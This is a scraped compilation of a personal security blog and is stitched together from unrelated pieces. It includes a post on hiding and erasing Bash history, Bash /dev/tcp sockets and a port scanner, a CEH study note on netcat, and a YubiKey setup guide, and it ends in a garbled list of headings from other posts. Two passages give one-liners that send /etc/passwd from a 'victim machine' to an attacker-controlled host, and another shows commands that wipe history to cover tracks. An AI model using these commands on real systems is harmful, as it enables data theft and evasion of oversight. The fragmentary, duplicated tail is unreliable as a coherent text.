TL;DR: if HISTCONTROLis set to ignoreboth (the default) or ignorespace , any command starting with a whitespace will not be registered. So instead of “passwd root”, you can use “ passwd root” (notice the space prefix) and the command will not be logged.

Now this isn’t very reliable, so keep going.

$ 100 bucks say you will forget that mysql command, uh?

You can instruct Bash to ignore commands that contain certain strings. This is more useful if you usually type things like passwords on your command line (STOP DOING THAT) and you don’t want those logged. Now, don’t put your password in there, silly. Use the command that usually accompanies it, like mysql or something.

According to the Bash manpage:

HISTIGNORE  
    A colon-separated list of patterns used to decide which command lines should be saved on the history list. Each pattern is anchored at the beginning of the line and must match the complete line (no implicit \`\*' is appended). Each pattern is tested against the line after the checks specified by HISTCONTROL are applied. In addition to the normal shell pattern matching characters, \`&' matches the previous history line.\`&' may be escaped using a backslash; the backslash is removed before attempting a match. The second and subsequent lines of a multi-line compound command are not tested, and are added to the history regardless of the value of HISTIGNORE.

So, to ignore all commands starting with mysql, you can use:


export HISTIGNORE="mysql\*"

Send the history into oblivion

In Bash, the history is logged at the end of session. This means that you can do cool stuff like saying to Bash to log that session into the void.

According to the Bash manpage:

HISTFILE  
    The name of the file in which command history is saved (see HISTORY below). The default value is ~/.bash\_history. If unset, the command history is not saved when a shell exits.

So, by using one of the lines below, you can get rid of that pesky history. Just remember to do it before you logout (preferably immediately after you logged in).


export HISTFILE=/dev/null 
unset HISTFILE # alternative

You can also use HISTSIZE for that.

According to the Bash manpage:

HISTSIZE  
    The number of commands to remember in the command history (see HISTORY below). If the value is 0, commands are not saved in the history list. Numeric values less than zero result in every command being saved on the history list (there is no limit).  
    The shell sets the default value to 500 after reading any startup files.

Meaning that would also work:


export HISTSIZE=0

Afraid that your nasty secrets were already logged? Make a dramatic exit. Just remember dramatic exits make noise, meaning it’ll be clear someone erased the history. And of course, this won’t erase logs sent to a logging service.


rm -f $HISTFILE && unset HISTFILE && exit

There will be additional content on erasing tracks on the future, not just on Bash. For now, checkout the Additional Reading section at the end of the article.

Socket Fun

Suppose you are on an extremely restricted environment and want to open a connection to the outside. The firewall isn’t restricting outgoing connections, but you don’t have access to anything like netcat, curl or wget.

You may be lucky if you find yourself in this scenario but the shell you are using is bash compiled with --enable-net-redirections , which is the default in many recent distributions.

Basically, this is the syntax:


exec {file descriptor}<>/dev/{protocol}/{host}/{port}

A file descriptor is an abstract indicator used to access an I/O resource, such as a pipe or a network socket.

It must also be a non-negative number (because 0 is allowed), and in our particular case, must be equal to or greater than 3, because we already have 0 (stdin), 1 (stdout) and 2 (stderr) reserved.

Let’s look into some examples.

GET a remote page


exec 3<>/dev/tcp/example.com/80  
echo -e "GET / HTTP/1.1\\r\\nHost: example.com\\r\\nConnection: close\\r\\n\\r\\n" >&3  
cat <&3

The first line opens a bidirectional (because of the <>) TCP socket to example.com at port 80/TCP.

The second line issues a GET command from the HTTP protocol, effectively fetching the page. The command is then sent to the file descriptor 3 that we opened on the first line.

The third line reads back from the socket, printing the contents of http://example.com.

Display a SSH server version

Using this socket, you can get the version of a SSH server running somewhere else. This happens because, upon completing a TCP handshake, the SSH server sends to the client a banner containing it’s version.


exec 3</dev/tcp/10.23.55.1/22  
timeout 1 cat <&3

The first line was already explained. The second line is the same as the cat command on the previous example, except this time it contains a timeout of 1 second. This is because the connection on this case is never closed, so the cat would never return as it would think there was still data to receive. Keep in mind though that this timeout only applies if the connection is successful, it will not timeout if the connection never finishes, instead the default timeout of 60 seconds will be used.

On the GET example this doesn’t happen because of the Connection HTTP header which was set to close, instructing the remote server to just sent the requested page and hang up the connection.

In case you want a one-liner:


timeout 1 cat </dev/tcp/ **10.23.55.1** /22

In this case, no file descriptor is created because we are immediately using the socket.

Testing whether a connection is successful

Using the return code, you can determine if a connection was successful (i.e. the port is open)


#!/bin/bash
(echo >/dev/tcp/example.com/80) &>/dev/null

if [$? -eq 0]; then  
    echo "Connection successful"  
else  
    echo "Connection failed"  
fi

You can do this on one line also.


echo >/dev/tcp/example.com/80 && echo "Connection successful" || echo "Connection failed"

Port Scanning

In case you don’t have something like nmap nor do you have a proper compiler or interpreter to write your own port scanning code, this can get you off the hook.


#!/bin/bash

for ((port=1; port<=65535; port++)); do  
    (echo >/dev/tcp/$host/$port) &>/dev/null && echo "$port open" || echo "$port closed"  
done

This will take sometime (specially because closed ports will take a long time to time out), but will work. Try restricting it to ports that really matter to you.

More Fun

Remember how you can set netcat to listen on a specific port? ;)


# On your machine  
nc -l -p 666 # On the victim machine  
cat /etc/passwd >/dev/tcp/cnc.hyades.io/666

Additional Reading

https://jvns.ca/blog/2017/03/26/bash-quirks/

http://tldp.org/LDP/abs/html/sha-bang.html

Sources

http://xmodulo.com/tcp-udp-socket-bash-shell.html

Kitten Exfiltration

Henrique Goncalves — Sat, 09 Nov 2019 09:27:56 +0000

Originally posted at https://blog.hadenes.io/post/kitten-exfiltration/

This cat is sad because it’s shell didn’t pop…

We are in no way associated with EC Council or any other group or company, and the only purpose of this series is to sum up our study group learnings.

The Question

CEH presents us with this question:

What is the outcome of this command:


nc -l -p 2222 | nc 10.1.0.43 1234

a) Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222

b) Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234

c) Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222

d) Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43

The Answer

Netcat , or nc is a small utility used for reading from and writing to network connections using TCP or UDP.

It can be used for port scanning, file transfers, port listening and specially as a backdoor.

On the CEH question, nc is used twice in two separate commands, so let’s first dissect the command line presented by adding parentheses to differentiate each part.


(nc -l -p 2222) (|) (nc 10.1.0.43 1234)

In shell we read the command line from the right to the left, so let’s start by the nc 10.1.0.43 1234 part.


nc 10.1.0.43 1234

In this part, we have the main command ( nc ) and two arguments ( 10.1.0.43 and 1234 )

This is pretty straightforward. If we check the nc manpage, we’ll see that it’s basic syntax is


nc [-options] hostname port[s] [ports] ...

So, in this case, we simply apply the syntax to our command and we get:

nc : the command itself

10.1.0.43 : the hostname argument

1234 : the port argument

What this means is that nc will take anything it receives on the stdin and will send it to port 1234 of the host 10.1.0.43. By default, netcat uses TCP unless -u is specified, so the server will receive the payload on the port 1234/TCP.

The next thing we have is a pipe ( | ). In shell a pipe indicates that we’ll take anything the command on the left ( nc -l -p 2222 ) outputs and send it to the command on the right ( nc 10.1.0.43 1234 ).

This basically means that the server 10.1.0.43 will receive on port 1234/TCP whatever nc -l -p 2222 outputs. If the command was like this:


echo potato | nc 10.1.0.43 1234

That means that the server 10.1.0.43 would receive the string “potato” on port 1234/TCP.


nc -l -p 2222

Finally, for the command on the left, we can again lookup the netcat manual or we can use explainshell.com to get a nicer view of what is going on.

The first option is -l. What this does is put netcat into the listening mode, meaning it will wait for connections on a specific port and will output whatever it receives. The port in this case is 2222 , as specified as an argument to -p.

For a server to be able to do anything relevant with a packet received on any port, it needs a program listening on that port, that is, a program that is actively waiting for something to arrive. In this case, this program in nc.

To sum up, what the command line is doing is setting nc to listen on port 2222/TCP (remember, TCP is the default) and sending anything it receives on that port to a different connection to the server 10.1.0.43 on port 1234/TCP.

nc -l -p 2222 : listens on port 2222/TCP and outputs whatever it receives

| : takes the output of the command on the left and send it to the command on the right

nc 10.1.0.43 1234 : sends it’s input to the server 10.1.0.43 on port 1234/TCP

We have all the parts dissected, so now it’s easy to answer the question. The answer is B.

Data Exfiltration

What if we wanted to exfiltrate the content /etc/passwd to a server we have setup before (let’s call it cnc.hyades.io ) that is listening on port 666/UDP?

It’s simple, we just do:


cat /etc/passwd | nc -u cnc.hyades.io 666

Can you see the possibilities? ;)

Also, as previously mentioned, it’s possible to use netcat as a backdoor. We’ll discuss this in another article.

Making the Most Out of Your Yubikey 4

Henrique Goncalves — Sat, 21 Jul 2018 00:00:00 +0000

Originally posted at https://blog.hadenes.io/post/making-the-most-out-of-your-yubikey-4/

An update is coming soon with the new Yubikey 5 features

I have used YubiKey for years now. I had a battle-proven Yubikey NEO for the last 5 years on my keyring, and honestly, after rain, mud, falls, dog bites and washing machines, it was impeccable, if a bit worn out. Those things are nearly indestructible.

I recently got a new one in a conference, along with a YubiKey 4C, and decided to give the old one to a friend just for the sake of passing it along.

I decided to use the 4C as my main YubiKey and the new NEO as a backup.

Another friend of mine attended the same conference and got the same YubiKey, and has been bugging me to write a guide on how I use my device. Guess he got it.

YubiKey NEO x YubiKey 4C

Before we begin, let’s discuss the differences between both versions of YubiKey I’m using and why I choose one over another to be my primary.

Both versions supports:

Yubico’s OTP (like a HOTP validated by Yubico’s servers)
2 configuration slots (going to talk more about that later on)
OATH-HOTP
Static Password
Challenge-Response
U2F
PIV
OpenPGP SmartCard

YubiKey NEO main difference is the NFC support, which allows it to be used with both Android and iOS. Also, the OpenPGP applet supports keys up to 2048 bits long. It’s connection is regular USB.

YubiKey 4C, on the other hand, has no NFC support, but allows for OpenPGP keys up to 4096 bits long. It’s connection is USB C, and has a smaller form factor.

I decided to use the 4C as the primary due to it’s key length and the fact that I don’t really use NFC (plus, my Pixel phone has an USB C connection and it works great with the OpenKeyChain app, which also supports NFC). The smaller form factor is also a nice plus since I already have a pretty bulky keychain because of my Ledger Nano.

Along with that, having a backup that supports more connections than the default, and a more common USB port, allows for more flexibility on an emergency situation.

I’ll add a Backup section everywhere it’s applicable so you know what you should do with your second YubiKey, if you decided to have one. I highly recommend you do, to avoid getting locked out of your stuff.

U2F

U2F is an open authentication standard that enables internet users to securely access any number of online services with one single security key instantly and with no drivers or client software needed.

Imagine it like a hardware based second factor. Now, this is not meant to be used as the single authentication factor, unlike it’s spirit successor FIDO 2, which is meant to replace passwords entirely.

Most major services today support U2F and are committed to support FIDO 2 when that comes out.

I have it enabled in Facebook, G Suite, GitHub, GitLab, DropBox, BitBucket and some others I don’t remember.

You can get a list of services that support U2F on Yubico’s website, but it’s by no means an exhaustive list. Check out the services you use to see if you can enable U2F.

Google Chrome is the only browser to fully support it, but you can enable experimental support on Firefox by setting **security.webauth.u2f **to true in about:config. I use it, and it worked flawlessly so far.

Backup: You can add as many hardware keys as you like with U2F, so just make sure you have both your keys in hand when you enable it, and you can add both.

Check some screenshots below of U2F on GitHub.

Note the “2 security keys”

The first one is my YubiKey 4C, and the second one is my NEO.

PAM U2F

You can use your YubiKey’s U2F capabilities with PAM to allow you to log into your machine in a more secure way.

Unfortunately, this don’t really work with SSH except with some modifications on both client and server, so just stick with the GPG public key authentication I’m going to explain below.

Still, it’s cool to set it up on your local machine, and for that I followed James the Bard guide to have it running on my Arch Linux. This should work on any distro with some modifications, given that PAM is default almost everywhere.

Backup: Follow the same procedures on your backup key to have it working in your host.

TOTP

Some versions ago (I don’t know exactly when), YubiKey supported storing TOTP secrets by assigning a OATH-HOTP configuration to one of the slots.

Gladly, this is no longer needed, and new YubiKeys are able to store up to 32 TOTP secrets in a separate storage that doesn’t reside in any of the configuration slots.

Now, this 32 limit may be enough for most people, but it’s not for me. I have LOTS of TOTPs enabled, so what I did is use Authy for storing all TOTPs (with synchronization enabled so I don’t lose them), and only store the important stuff on YubiKey, making sure to also have them on Authy.

When adding a new secret, just scan the QR Code with both Authy and the YubiKey app and you are good to go.

For secrets you had before, if you don’t have a backup of the QR Code or the secret, and you used Authy, you can use this tip or this one to dump the secrets from the Authy chrome extension. I used the later one, and it worked great.

Since I use i3wm, I looked for a way to have this TOTP integrated with my desktop, so I could have my 2FA keys a key combo away, provided my YubiKey was connected. emlun had the same idea, and created yubikey-oath-dmenu, which I use to this day and am very happy with. In i3, I assigned it to the Super+T shortcut (for Token), and made it copy to the clipboard.


bindsym $mod+t exec yubikey-oath-dmenu --clipboard clipboard --notify

For mobile, you can use the Yubico’s Authenticator App, except you need Android to do that. It also works with NFC and USB C versions of YubiKey.

For desktop, you have the yubioath-desktop.

Backup: I found it too tiresome to add keys to the backup YubiKey everytime I added to the primary one, so I just use Authy for the backup here.

PIV

I don’t really use the PIV smartcard applet, opting to use the OpenPGP applet that suits me. But one doesn’t stop you from using the other, and Yubico’s site gives some nice examples of where you could use PIV, for example for OSX Code Signing or Docker Hardware Signing.

Even if not using it, it didn’t feel ok to have it with the default values, so I followed Yubico’s guide to change it’s PIN, PUK and management key using yubico-piv-tool.


yubico-piv-tool -achange-pin -P123456 -NXXXXXX
yubico-piv-tool -achange-puk -P12345678 -NXXXXXXXX
yubico-piv-tool -aset-mgm-key -nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Backup: Follow the same steps just so you don’t have it at the default.

GPG

The OpenPGP smartcard applet is where, in my opinion, YubiKey shines. It allows to a lot of stuff, from the regular file or email signing, to SSH public key authentication and GIT commit signing.

There are a lot of guides on how to set this up, so I’m going to leave a good one here, drduh’s guide, and just point what I did.

I choose to create a 4096 master key and back it up on a secure place (out of my regular .gnupg keychain), and then I uploaded 4096 subkeys to my main YubiKey and 2048 ones to my backup YubiKey.

In a previous version, I mentioned subkeys are directly derived from the master key and that you could use either one and they will validate. This was wrong, so apologies are due. Share your master key public part for daily use.

Backup: As mentioned, just uploading the subkeys to the backup key is enough to have it working anywhere your main keys work.

SSH

For SSH login, after you configured the GPG key, you can run:


gpg2 --export-ssh-key KEY_ID

and you will get an SSH public key that you can just put on any server’s authorized_keys and have it working, provided you have gpg-agent properly configured on your client machine. Next time you login, it’s going to ask for your 6 digit GPG PIN to perform the authentication.

GIT

To have it working on git commits, it’s even simpler. First, you have to enable commit signing with


git config --global commit.gpgsign true

And then you have to specify which key you are going to use to sign the commits with


git config --global user.signingkey KEY_ID

That’s it, you are ready to go. Next time you perform a *git commit, *it’s going to ask you for your GPG PIN (6 digits) and will sign your commit, leaving a nice Verified badge on your commits on GitHub.

GitHub also provides a guide on commit signing that you may want to check out.

Conclusion

That´s how I use my Yubikeys. I found them to be extremely useful and physically resistant, packing a lot of features on an incredibly small device. This is not a paid post, so guess that can give you a feeling of how much I appreciate Yubico’s work on those devices.

Hope you liked it, feel free to reach me if you have any questions.

DEV Community: Henrique Goncalves

O que é throttling e como implementar em Go

Entendendo o throttling

Implementando throttling em Go

Channels

Exemplo

1. Pacote principal e importação de bibliotecas

2. Variáveis globais

3. Função monitor

4. Função main

Resumo

Testando o código

1password.el: Integrating 1Password with Emacs and auth-source

Core Functions

Requirements

Installation

Chloe AI Assistant

Chloe AI Assistant

Features

Installation

Usage

Telegram

Examples

HTTP

POST /api/complete

Text

Image

Audio

Command Line (CLI)

Contributing

License

References

Acknowledgements

Simplifying Blog Writing with OpenAI's ChatGPT API - Auto-generating Summaries, Tags, and Titles for Your Posts

Prerequisites

Installing the Dependencies

The Script

Example output

Explanation

Prompting

Conclusion

How to Request Admin Permissions in Windows Through UAC with Golang

Requesting Admin Permissions

Source

Convert a Proxmox Windows Guest from BIOS to UEFI

Prerequisites

Converting the Windows Guest to UEFI

Prometheus Alerting Rule for Redis Clients

SystemD Timers vs Code Loops

The case for SystemD Timers

Pros

timerfd

Resource Accounting

Last Run and Next Run

Immediate Changes

Cons

Startup Cost

Excessive Logging

Accuracy

The case for Code Loops

Charts

Conclusion

Fun with Shells

Fun with Shells

Covering Tracks

All I need is a little space

$ 100 bucks say you will forget that mysql command, uh?

Send the history into oblivion

Socket Fun

GET a remote page

Display a SSH server version

Testing whether a connection is successful

Port Scanning

More Fun

Additional Reading

Sources

Kitten Exfiltration

The Question

The Answer

Data Exfiltration

3. Função `monitor`

4. Função `main`